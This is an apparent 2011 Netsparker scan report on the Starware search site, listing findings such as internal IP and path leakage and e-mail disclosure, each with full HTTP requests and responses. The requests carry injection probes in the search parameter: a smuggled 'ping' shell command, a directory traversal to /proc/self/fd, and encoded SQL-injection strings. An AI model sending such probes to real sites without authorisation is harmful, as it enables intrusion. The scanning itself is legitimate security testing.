href="http://www.google.com/aclk?sa=L&ai=ChUFoCmv_TYyRE8Oh0AG2r4TwB47z5uwBxsmGrxa7h5LyCxACIIemgQgoAlDn7Pvl_f____8BYMkGkAECyAEBqgQeT9Dfab1VNYg-G5j-JVu9ShHN7t7pnXA3TiHSoMgr&num=2&sig=AGiWqtx2sscXXP_xfNrKk-ST86F9YXiT_g&adurl=http://go.sp-ask.com/us/r5%3Fq%3Dwww%2Bresource%2Bcom%26siteid%3D14213%7C14213%7C14213%26sq%3D1" onmouseover="window.status='http://www.ask.com';return true;" onmouseout="window.status='';return true;">Find Www <b>Resource</b> Com Get Www <b>Resource</b> Com</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=ChUFoCmv_TYyRE8Oh0AG2r4TwB47z5uwBxsmGrxa7h5LyCxACIIemgQgoAlDn7Pvl_f____8BYMkGkAECyAEBqgQeT9Dfab1VNYg-G5j-JVu9ShHN7t7pnXA3TiHSoMgr&num=2&sig=AGiWqtx2sscXXP_xfNrKk-ST86F9YXiT_g&adurl=http://go.sp-ask.com/us/r5%3Fq%3Dwww%2Bresource%2Bcom%26siteid%3D14213%7C14213%7C14213%26sq%3D1" onmouseover="window.status='http://www.ask.com';return true;" onmouseout="window.status='';return true;">www.ask.com</a></p></div></div><div id="al-1" class="al b"><h1>Web Search Results for <b>php://filter//resource=http://netsparker...</b></h1><h2>Results <b>11</b>-<b>20</b> of about <b>58</b></h2><div><p class="t"><a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">Troy Hunt: OWASP Top 10 for .NET developers part 1: Injection</a></p><p class="s"><a>May 13, 2010 <b>...</b> The Top 10 is a fantastic <b>resource</b> for the purpose of identification <b>...</b> stack <br> had fewer exploits than the likes of <b>PHP</b>, Java and Perl. <b>....</b> Obviously 1=1 <br> always evaluates to true so the <b>filter</b> by category is entirely invalidated. <b>...</b> <br> based on the query string value <b>and</b> that there is a table called <b>...</b></a></p><p class="h"><a href="http://www.troyhunt.com/2010/05/owasp-top-10-for-net-developers-part-1.html">www.troyhunt.com<wbr/>/2010<wbr/>/05<wbr/>/owasp<wbr/>-top<wbr/>-10<wbr/>-for<wbr/>-net<wbr/>-developers<wbr/>-part<wbr/>-1.html</a></p></div><div><p class="t"><a href="http://johncrackernet.blogspot.com/2009/02/howto-installing-squid-proxy-in-pfsense.html">NSM Security Solutions: Howto: Installing Squid Proxy in pfSense</a></p><p class="s"><a>Feb 7, 2009<b>...</b> sharing network <b>resources</b>, to aiding security by <b>filtering</b> traffic. <b>...</b> <br> fetch <b>http</b>:/iniparse.googlecode.com/files/iniparse-x.x.x.tar.gz <b>....</b> <b>http</b>://doc.<br> pfsense.org/index.<b>php</b>/Setup_VideoCache_with_Squid <b>...</b> How do they compare to <br> these guys I found recently: <b>N</b>-able <..
[Possible] Internal IP Address Leakage
[Possible] Internal IP Address Leakage
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.
Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
Parameters
Parameter
Type
Value
qry
GET
"& ping -n 26 127.0.0.1 &
qry_lnk
GET
Hack
src_id
GET
305
client_id
GET
3
product
GET
unknown
serv
GET
web
subproduct
GET
site
version
GET
3
it
GET
-1
step
GET
2
rs_prev
GET
xss
10.19.0.5
Request
GET /dp/search?qry=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&qry_lnk=Hack&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C1308584649-18-1-Q29va2llcw%3D%3D%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:44:34 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:44:34 GMT Pragma: no-cache Set-Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C1308584649-18-1-Q29va2llcw%3D%3D%2C1308584674-1-1-IiYgcGluZyAtbiAyNiAxMjcuMC4wLjEgJg%3D%3D%3B; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/; domain=.starware.com Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware "& ping -n 26 127.0.0.1 & Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = '305'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/%22%26+ping+-n+26+127.0.0.1+%26">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=%22%26+ping+-n+26+127.0.0.1+%26" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="305"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="3"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value='"& ping -n 26 127.0.0.1 &' class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id=305&product=prefs&bookmark=L2RwL3NlYXJjaD9xcnk9JTIyJTI2JTIwcGluZyUyMC1uJTIwMjYlMjAxMjcuMC4wLjElMjAlMjYmcXJ5X2xuaz1IYWNrJnNyY19pZD0zMDUmY2xpZW50X2lkPTMmcHJvZHVjdD11bmtub3duJnNlcnY9d2ViJnN1YnByb2R1Y3Q9c2l0ZSZ2ZXJzaW9uPTMmaXQ9LTEmc3RlcD0yJnJzX3ByZXY9eHNz">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=Ping+Pong&qry_lnk=Ping+Pong&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Pong</a></p><p><a href="/dp/search?qry=Test+IP+Ping&qry_lnk=Test+IP+Ping&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Test IP Ping</a></p><p><a href="/dp/search?qry=Ping+Golf+Clubs&qry_lnk=Ping+Golf+Clubs&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Golf Clubs</a></p><p><a href="/dp/search?qry=Ping+Driver&qry_lnk=Ping+Driver&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Driver</a></p><p><a href="/dp/search?qry=Blog+Ping&qry_lnk=Blog+Ping&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Blog Ping</a></p><p><a href="/dp/search?qry=ARP+Ping&qry_lnk=ARP+Ping&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">ARP Ping</a></p><p><a href="/dp/search?qry=Ping+Meter&qry_lnk=Ping+Meter&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Meter</a></p><p><a href="/dp/search?qry=Ping+Media&qry_lnk=Ping+Media&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Media</a></p><p><a href="/dp/search?qry=Ping+Time&qry_lnk=Ping+Time&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Time</a></p><p><a href="/dp/search?qry=Ping+Server+Monitor&qry_lnk=Ping+Server+Monitor&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=%22%26+ping+-n+26+127.0.0.1+%26&serv=web">Ping Server Monitor</a></p><br><h1>Recent Searches</h1><p><a href="/dp/search?qry=Cookies&qry_lnk=Cookies&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">Cookies</a></p><p><a href="/dp/search?qry=xss&qry_lnk=xss&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">xss</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id=305">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>"& ping -n 26 127.0.0.1 &</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=CAtKe4mr_Tc7GFOKh0AHG3fWGCODrmKwCsLSvgi_i8unqAhABIIemgQhQsKLWjfj_____AWDJBqABmNShzgPIAQGqBCFP0Kgx9IMWmBD8E5K4ccdlelxAsN-stedZsRyJA29xDn0&num=1&sig=AGiWqtwz799XIl9oKsZ2eS4Zjia8Ec2lYw&adurl=http://www.best-price.com/search/landing/query/26%2Bpin/s/google/koid/4579785651/" onmouseover="window.status='http://www.best-price.com/<b>26</b>-Pin';return true;" onmouseout="window.status='';return true;">Find super cheap <b>26</b> Pin</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=CAtKe4mr_Tc7GFOKh0AHG3fWGCODrmKwCsLSvgi_i8unqAhABIIemgQhQsKLWjfj_____AWDJBqABmNShzgPIAQGqBCFP0Kgx9IMWmBD8E5K4ccdlelxAsN-stedZsRyJA29xDn0&num=1&sig=AGiWqtwz799XIl9oKsZ2eS4Zjia8Ec2lYw&adurl=http://www.best-price.com/search/landing/query/26%2Bpin/s/google/koid/4579785651/" onmouseover="window.status='http://www.best-price.com/<b>26</b>-Pin';return true;" onmouseout="window.status='';return true;">Buy cheap <b>26</b> Pin at BEST-PRICE.com! Over 6.000 shops & 23 Mil products.</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=CAtKe4mr_Tc7GFOKh0AHG3fWGCODrmKwCsLSvgi_i8unqAhABIIemgQhQsKLWjfj_____AWDJBqABmNShzgPIAQGqBCFP0Kgx9IMWmBD8E5K4ccdlelxAsN-stedZsRyJA29xDn0&num=1&sig=AGiWqtwz799XIl9oKsZ2eS4Zjia8Ec2lYw&adurl=http://www.best-price.com/search/landing/query/26%2Bpin/s/google/koid/4579785651/" onmouseover="window.status='http://www.best-price.com/<b>26</b>-Pin';return true;" onmouseout="window.status='';return true;">www.best-price.com/<b>26</b>-Pin</a></p></div></div><div id="al-1" class="al b"><h1>Web Search Results for <b>"& ping -n 26 127.0.0.1 &</b></h1><h2>Results <b>1</b>-<b>10</b> of about <b>31,000</b></h2><div><p class="t"><a href="http://forums.freebsd.org/showthread.php?t=17267">[Solved] <b>ping</b> -f <b>127.0.0.1</b> - The FreeBSD Forums</a></p><p class="s"><a>[Solved] <b>ping</b> -f <b>127.0.0.1</b> Off-Topic. <b>...</b> Old August <b>26th</b>, 2010, 10:33 <b>...</b> why <br> is there 30% pacet loss when <b>pinging 127.0.0.1</b>? <b>...</b></a></p><p class="h"><a href="http://forums.freebsd.org/showthread.php?t=17267">forums.freebsd.org<wbr/>/showthread.php<wbr/>?t=17267</a></p></div><div><p class="t"><a href="http://www.windowsitpro.com/community/forums/aft/49081"><b>Ping</b> always resolve <b>127.0.0.1</b> - Windows IT Pro - Reader Forums <b>...</b></a></p><p class="s"><a>I have added this to my hosts file 127.0.0.2 mysite.com but when i try to <b>ping</b> <br> 127.0.0.2 it always response <b>127.0.0.1</b> why???</a></p><p class="h"><a href="http://www.windowsitpro.com/community/forums/aft/49081">www.windowsitpro.com<wbr/>/community<wbr/>/forums<wbr/>/aft<wbr/>/49081</a></p></div><div><p class="t"><a href="http://superuser.com/questions/29720/general-failure-when-pinging-to-127-0-0-1">windows 7 - "GENERAL FAILURE" when <b>pinging</b> to <b>127.0.0.1</b> - Super User</a></p><p class="s"><a>Aug 25, 2009 <b>...</b> “GENERAL FAILURE” when <b>pinging</b> to <b>127.0.0.1</b> [closed] <b>...</b> more details? maybe a <br> screenshot of ipconfig /all – Molly7244 Aug <b>26</b> '09 at 0:24 <b>...</b></a></p><p class="h"><a href="http://superuser.com/questions/29720/general-failure-when-pinging-to-127-0-0-1">superuser.com<wbr/>/questions<wbr/>/29720<wbr/>/general<wbr/>-failure<wbr/>-when<wbr/>-pinging<wbr/>-to<wbr/>-127<wbr/>-0<wbr/>-0<wbr/>-1</a></p></div><div><p class="t"><a href="http://wiki.basho.com/HTTP-Ping.html">Basho: HTTP <b>Ping</b></a></p><p class="s"><a>Jul 16, 2010 <b>...</b> curl -v http://<b>127.0.0.1</b>:8098/<b>ping</b> * About to connect() to <b>127.0.0.1</b> port 8098 (<br> #0) <b>...</b> 16 Jul 2010 02:34:<b>26</b> GMT < Content-Type: text/html <b>...</b></a></p><p class="h"><a href="http://wiki.basho.com/HTTP-Ping.html">wiki.basho.com<wbr/>/HTTP<wbr/>-Ping.html</a></p></div><div><p class="t"><a href="http://forums.zend.com/viewtopic.php?f=8&t=12083&start=0">Zend Forums • View topic - Server stopped serving a directory of PHP</a></p><p class="s"><a><b>127.0.0.1</b> - - [<b>26</b>/Apr/2011:15:48:41 -0500] "POST /ZendServer/index.php?<br> controller=systray&action=exec&do=<b>ping</b> HTTP/1.1" 200 180 <b>...</b></a></p><p class="h"><a href="http://forums.zend.com/viewtopic.php?f=8&t=12083&start=0">forums.zend.com<wbr/>/viewtopic.php<wbr/>?f=8<wbr/>&t=12083<wbr/>&start=0</a></p></div><div><p class="t"><a href="http://forumremotescan.com/viewtopic.php?f=4&t=1717">RemoteScan Support Forum • View topic - Error: User Cancelled</a></p><p class="s"><a>Jan 07, 2008 04:29:<b>26</b> PM: Connection from <b>127.0.0.1</b>. Jan 07, 2008 04:29:<b>26</b> PM: <br> <b>Ping</b> from workstation NF-31 (NF-31) Jan 07, 2008 04:29:<b>26</b> PM: <b>...</b></a></p><p class="h"><a href="http://forumremotescan.com/viewtopic.php?f=4&t=1717">forumremotescan.com<wbr/>/viewtopic.php<wbr/>?f=4<wbr/>&t=1717</a></p></div><div><p class="t"><a href="http://forum.tinycorelinux.net/index.php?topic=9423.0">Cannot <b>ping</b> to tinycore by hostname</a></p><p class="s"><a><b>PING</b> tinycorepc (<b>127.0.0.1</b>): 56 data bytes 64 bytes from <b>127.0.0.1</b>: seq=0 ttl=64 <br> <b>...</b> Quote from: gerald_clark on April 28, 2011, 12:27:<b>26</b> PM <b>...</b></a></p><p class="h"><a href="http://forum.tinycorelinux.net/index.php?topic=9423.0">forum.tinycorelinux.net<wbr/>/index.php<wbr/>?topic=9423.0</a></p></div><div><p class="t"><a href="http://forums.realsoftware.com/viewtopic.php?f=2&t=38224">Real Software Forums • View topic - Strange delay on TCPSocket <b>...</b></a></p><p class="s"><a>50 49 4e 47 <b>PING</b> ## T +0.000119 <b>127.0.0.1</b>:4000 -> <b>127.0.0.1</b>:63409 [AP] <b>...</b> by <br> Schmurfy » Sat Mar <b>26</b>, 2011 8:52 pm. I love these forums. <b>...</b></a></p><p class="h"><a href="http://forums.realsoftware.com/viewtopic.php?f=2&t=38224">forums.realsoftware.com<wbr/>/viewtopic.php<wbr/>?f=2<wbr/>&t=38224</a></p></div><div><p class="t"><a href="http://www.tomshardware.com/forum/75857-45-ping-test"><b>ping</b> test - Windows-XP-General-Discussion - Windows-XP</a></p><p class="s"><a><b>ping 127.0.0.1</b>. Hit your Enter key. You should see... C:\><b>ping 127.0.0.1</b> <b>....</b> <br> Message edited by hemanaga87 on 04-<b>26</b>-2010 at 08:14:34 AM <b>...</b></a></p><p class="h"><a href="http://www.tomshardware.com/forum/75857-45-ping-test">www.tomshardware.com<wbr/>/forum<wbr/>/75857<wbr/>-45<wbr/>-ping<wbr/>-test</a></p></div><div><p class="t"><a href="https://forum.openwrt.org/viewtopic.php?pid=108823">OpenWrt / Source Based Routing over OpenVPN tun0</a></p><p class="s"><a>broadcast 127.0.0.0 dev lo proto kernel scope link src <b>127.0.0.1</b> <b>...</b> I can <b>ping</b> <br> the VPN server ok, the address 10.19.0.5 works. <b>...</b> 02:<b>26</b>:09.172214 IP 192.168.<br> 1.10.49414 > 208.67.222.222.53: 13473+ A? www.google.com. <b>...</b></a></p><p class="h"><a href="https://forum.openwrt.org/viewtopic.php?pid=108823">forum.openwrt.org<wbr/>/viewtopic.php<wbr/>?pid=108823</a><..
Forbidden Resource
Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
Request
GET /dp/content/ HTTP/1.1 Referer: http://as.starware.com/dp/content/acme/javascript/util.js?750 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden Date: Mon, 20 Jun 2011 15:44:08 GMT Server: Apache Last-Modified: Tue, 11 May 2010 14:28:12 GMT ETag: "0-4be9697c" Accept-Ranges: bytes Content-Length: 0 Content-Type: text/html
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
customerservice@starware.com
Request
GET /dp/feedback?src_id=305 HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584647-7-1-eHNz%2C%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:44:09 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:44:09 GMT Pragma: no-cache Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Feedback</title><style type="text/css"> @import "/dp/content/starware/feedback/feedback.css"; </style><script language="javascript" type="text/javascript" src="/dp/content/acme/javascript/feedback/validate.js"></script></head><body><div id="head" class="h"><div id="bg" style="width:100%;height:25px;background:url(/dp/content/starware/feedback//img/logo_bg.gif);border-collapse:collapse"><div id="logo" style="width:252px;height:25px;background:url(/dp/content/starware/feedback//img/logo.gif);float:left"></div><div id="corner" style="width:7px;height:25px;background:url(/dp/content/starware/feedback//img/logo_right.gif);float:right"></div></div><p>Feedback</p></div><div id="content" class="c"><p>How are we doing? Please let us know.</p><p>If you're reporting a problem, please be as descriptive as possible. A specialist will get back to you.</p><p>We also welcome suggestions on improving our service.</p><form id="feedback" name="feedback" action="/dp/feedback" method="post" accept-charset="UTF-8" onsubmit="return validate();"><input type="hidden" name="src_id" value="305"><input type="hidden" name="client_id" value="N/A"><input type="hidden" name="version" value="N/A"><p>Your Name:<br><input type="text" class="t" style="margin-right: 0px;" name="name" value=""></p><p>Email:<br><input type="text" class="t" style="margin-right: 0px;" name="email" value=""></p><p>Retype Email:<br><input type="text" class="t" style="margin-right: 0px;" name="confirm_email" value=""></p><p>Type your message here:<textarea name="message" style="width: 100%"></textarea></p><p><input id="submitButton" type="button" class="b" onclick="document.feedback.submit.click();" value="Submit"><input type="reset" class="b" name="reset" value="Reset Form"><input type="submit" value="Submit" name="submit" style="display: none;"></p><p>*NOTE - if you have an anti-spam filter, please add customerservice@starware.com to your address book or contacts list.</p></form></div><div id="copyright" class="cr">© 2008 Starware. All Rights Reserved.</div></body></html>
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Error messages should be disabled.
Remove this kind of private data from the output.
External References
/dev/stdin /proc/self/fd/[0-2] /proc/self/fd/1 /dev/stdout /dev/stderr /proc/self/fd/0, /proc/self/fd/1, /dev/std /proc/self/fd/0 /bin/ln /proc/self/fd /dev/fd
Request
GET /dp/search?qry=../../../../../../../../../../proc/self/fd/2&qry_lnk=Hack&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584675-0--Jw%3D%3D%2C1308584676-1-1-SGFja05TX05P%2C1308584677-4-1-SGFjayBBTkQgJ05TPSdzcw%3D%3D%2C1308584677-1-1-JyBPUiAnbnMnPSducw%3D%3D%2C1308584678-0--LTEgT1IgMTctNz0xMA%3D%3D%2C1308584678-0--IiZleHByIDI2ODQwOTI0MSAtIDIgJiI%3D%2C1308584681-0--JyZleHByIDI2ODQwOTI0MSAtIDIgJic%3D%2C1308584683-2-1-SGFjaw%3D%3D%2C1308584684-7-1-eHNz%2C1308584686-2-1-aHR0cDovL25ldHNwYXJrZXIuY29tL24%3D%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:44:46 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:44:47 GMT Pragma: no-cache Set-Cookie: prefs=searchHistory%3D1308584676-1-1-SGFja05TX05P%2C1308584677-4-1-SGFjayBBTkQgJ05TPSdzcw%3D%3D%2C1308584677-1-1-JyBPUiAnbnMnPSducw%3D%3D%2C1308584678-0--LTEgT1IgMTctNz0xMA%3D%3D%2C1308584678-0--IiZleHByIDI2ODQwOTI0MSAtIDIgJiI%3D%2C1308584681-0--JyZleHByIDI2ODQwOTI0MSAtIDIgJic%3D%2C1308584683-2-1-SGFjaw%3D%3D%2C1308584684-7-1-eHNz%2C1308584686-2-1-aHR0cDovL25ldHNwYXJrZXIuY29tL24%3D%2C1308584687-6-1-Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vcHJvYy9zZWxmL2ZkLzI%3D%3B; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/; domain=.starware.com Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware ../../../../../../../../../../proc/self/... Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = '305'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="305"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="3"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="../../../../../../../../../../proc/self/..." class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id=305&product=prefs&bookmark=L2RwL3NlYXJjaD9xcnk9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vcHJvYy9zZWxmL2ZkLzImcXJ5X2xuaz1IYWNrJnNyY19pZD0zMDUmY2xpZW50X2lkPTMmcHJvZHVjdD11bmtub3duJnNlcnY9d2ViJnN1YnByb2R1Y3Q9c2l0ZSZ2ZXJzaW9uPTMmaXQ9LTEmc3RlcD0yJnJzX3ByZXY9eHNz">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=2&qry_lnk=2&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">2</a></p><p><a href="/dp/search?qry=Linux+Linux&qry_lnk=Linux+Linux&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">Linux Linux</a></p><p><a href="/dp/search?qry=Highest+FD&qry_lnk=Highest+FD&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2F2&serv=web">Highest FD</a></p><p><a 